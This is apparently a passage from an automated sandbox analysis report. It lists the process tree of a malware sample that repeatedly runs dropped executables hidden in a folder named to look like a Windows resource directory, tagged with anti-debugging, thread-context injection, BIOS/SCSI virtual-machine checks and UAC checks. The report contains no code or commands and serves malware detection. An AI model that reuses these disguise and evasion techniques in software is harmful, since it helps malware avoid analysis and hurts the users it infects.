- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1760

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1612

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
PID:1192

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:1128

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1480

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1952

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:748

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1276

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1584

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1400

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1548

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:436

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2000

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1740

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1212

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1696

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:1824

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:320

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1064

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1072

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1080

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1432

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2032

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1912

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1072

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1400

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:948

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1432

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:888

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1988

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:788

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:1600

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1516

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1588

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:984

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:276

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1384

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1724

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1884

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1304

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1984

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1572

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:276

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:1516

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1384

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:472

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1460

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:788

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1544

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1548

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1912

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1460

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:436

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1936

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1612

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:188

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:1568

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1312

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2040

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1148

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:988

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:328

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:1460

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:436

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1516

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1548

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1732

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1288

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:456

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:1724

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1640

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:824

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:276

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:1260

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1128

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1588

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1428

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:1772

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:788

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks whether UAC is enabled
PID:1288

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
PID:2308

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2384

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Suspicious use of SetThreadContext
PID:2396

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Suspicious behavior: MapViewOfSection
PID:2408

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Checks BIOS information in registry
PID:2480

